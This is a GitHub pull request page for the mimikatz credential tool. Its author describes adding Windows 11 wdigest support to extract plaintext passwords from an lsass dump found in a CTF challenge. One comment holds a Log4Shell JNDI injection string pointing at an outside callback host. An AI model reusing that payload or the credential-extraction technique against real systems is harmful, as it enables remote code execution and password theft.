gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.3k stars 3.7k forks source link

Added support for Windows 11 wdigest #448

Open oxnan opened 4 months ago

oxnan commented 4 months ago

During a recent CTF there was a challenge to get the plaintext password from an lsass.exe dump on a windows 11 machine. Since wdigest is disabled by default in windows 11 there was no support for this in mimikatz, but by simply adding the following code, everything works as expected. It should be mentioned that you can use the windbg plugin to do this natively, but adding support to the standalone mimikatz would be ideal.

I have attached the lsass dump from the competition in the PR so you can verify the changes. lsass.tar.gz

Lucifer1993 commented 4 months ago

${jndi:ldap://${java:version}.dx3hbm.ceye.io}